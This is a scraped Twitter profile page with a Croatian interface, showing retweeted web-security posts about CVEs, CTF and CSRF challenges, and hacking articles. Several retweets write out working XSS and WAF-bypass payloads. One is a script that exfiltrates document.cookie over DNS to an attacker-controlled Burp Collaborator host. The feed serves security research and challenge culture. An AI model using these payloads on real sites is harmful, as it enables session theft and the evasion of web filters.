Tweetovi

Blokirali ste korisnika/cu @eorms36

Jeste li sigurni da želite vidjeti te tweetove? Time nećete deblokirati korisnika/cu @eorms36

  1. proslijedio/la je Tweet
    16. sij

    CVE-2020-2551 WebLogic RCE via IIOP protocol.

    Poništi
  2. proslijedio/la je Tweet
    10. sij

    [NEW] Challenge DM me if you solved it :) Have fun! * Solutions, 1 week from now.

    Prikaži ovu nit
    Poništi
  3. proslijedio/la je Tweet
    14. sij
    Prikaži ovu nit
    Poništi
  4. proslijedio/la je Tweet
    15. sij
    Poništi
  5. proslijedio/la je Tweet
    15. sij

    CVE-2020-5504 SQLI in phpMyAdmin: A malicious user could inject custom SQL in place of their own username when creating queries to this page fix:

    Poništi
  6. proslijedio/la je Tweet
    14. sij

    Voting is now open for the top 10 new web hacking techniques of 2019:

    Poništi
  7. proslijedio/la je Tweet
    13. sij
    Poništi
  8. proslijedio/la je Tweet
    13. sij

    Nice one by <svg onload="import('data:text/javascript,al'+''+'ert(0)')">

    Poništi
  9. proslijedio/la je Tweet
    13. sij

    The bug that exposed your Paypal password, excellent article by

    Poništi
  10. proslijedio/la je Tweet
    10. sij

    Yo hackers! I've built a small website that has some challenges. 🔗 The main challenge for the week is `WW3` All upcoming challenges will be hosted there, so stay tuned :) Would love to know what you guys think. Have fun!

    Poništi
  11. Poništi
  12. proslijedio/la je Tweet
    7. sij

    For the sake of exercising, I looked up some web challenges in a and noticed a cool SQLi one "Secure System". I discovered some cool stuff that you will not find it in tutorials so check it out! 😅

    Prikaži ovu nit
    Poništi
  13. proslijedio/la je Tweet
    6. sij

    Old stuff, new blogpost: Breaking PHP mt_rand() with math

    Poništi
  14. proslijedio/la je Tweet
    6. sij

    WAF bypass payload against Firefox by <image src\r\n=valid.jpg onloadend='new class extends (co\u006efir\u006d)/**/`` &lcub;&rcub;'>

    Poništi
  15. proslijedio/la je Tweet
    6. sij

    CSRF challenge by Goal: Change username to "pwned" Rules: 1.Only Chrome 2.Use Chrome 80 or enable "SameSite by default cookies" in chrome://flags 3.User interaction is allowed at most 1 click!

    Poništi
  16. proslijedio/la je Tweet
    5. sij

    I made a small CSRF challenge Goal: Change username to "pwned" Rules: 1.Only Chrome 2.Use Chrome 80 or enable "SameSite by default cookies" in chrome://flags 3.User interaction is allowed at most 1 click!

    Prikaži ovu nit
    Poništi
  17. proslijedio/la je Tweet
    5. sij
    Poništi
  18. proslijedio/la je Tweet
    27. pro 2019.

    My "simple" XSS challenge is over! Once again congratz to and for solving it! But also to everyone else that tried their best. Have you found all 11 vulnerabilities? 💪

    Poništi
  19. proslijedio/la je Tweet
    26. pro 2019.

    Cookie theft over DNS while XSS, payload by <script> document.location = "//" + btoa(document.cookie).replace(/[A-Z]/g, '$&.').replace(/=/g, 'X') + "I." + "YourBurpCollaborator"; </script> Decode: atob("Your_Receveived_DNS".replace(/(.)./g, (_,x)=>x.toUpperCase()))

    Poništi
  20. proslijedio/la je Tweet
    25. pro 2019.

    WAF XSS Bypasses by . Wordfence 7.4.2 <a href=&#01javascript:alert(1)> Sucuri CloudProxy (POST only) <a href=javascript&colon;confirm(1)> ModSecurity CRS 3.2.0 PL1 <a href="jav%0Dascript&colon;alert(1)">

    Poništi

Čini se da učitavanje traje već neko vrijeme.

Twitter je možda preopterećen ili ima kratkotrajnih poteškoća u radu. Pokušajte ponovno ili potražite dodatne informacije u odjeljku Status Twittera.

    Možda bi vam se svidjelo i ovo:

    ·